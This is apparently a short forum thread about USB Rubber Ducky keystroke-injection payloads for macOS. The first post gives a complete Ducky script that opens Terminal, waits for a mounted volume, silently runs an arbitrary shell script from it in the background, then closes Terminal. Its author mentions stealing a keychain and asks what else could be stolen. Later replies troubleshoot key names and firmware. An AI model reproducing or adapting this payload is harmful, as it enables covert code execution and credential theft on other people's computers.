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  1. I created a pretty simple payload for Mac OSX, this is the fastest I could get it. You might want to play with some delays but my decent mac is running this just fine. It basically types in a while loop in the terminal that waits for a volume to mount named DUCKY by looking for file 'a', and then executes an SH script called 'a' (the same file). This is done to make it as short as possible. DELAY 3000 COMMAND SPACE DELAY 200 STRING terminal ENTER DELAY 200 STRING while [ ! -f /Volumes/DUCKY/a ] ; do sleep 2 ; done && sh /Volumes/DUCKY/a & ENTER STRING disown ENTER STRING exit ENTER COMMAND Q So in your 'a' file you can write any length shell script you want, it will all execute on the background. P.s. I just stole my own keychain, are there any more interesting things I could try to steal?
  2. I can't delete my post but I found I should use COMMAND instead
  3. Hi, For some reason my GUI key doesn't work in combination with SPACE: DELAY 3000 GUI SPACE DELAY 200 STRING terminal ENTER Instead, it types the S and then continues onto the string. What is proper way to do a GUI SPACE? Oh I should not forget to mention, I installed c_duck_v2.1.hex, could that be the problem? Thanks!
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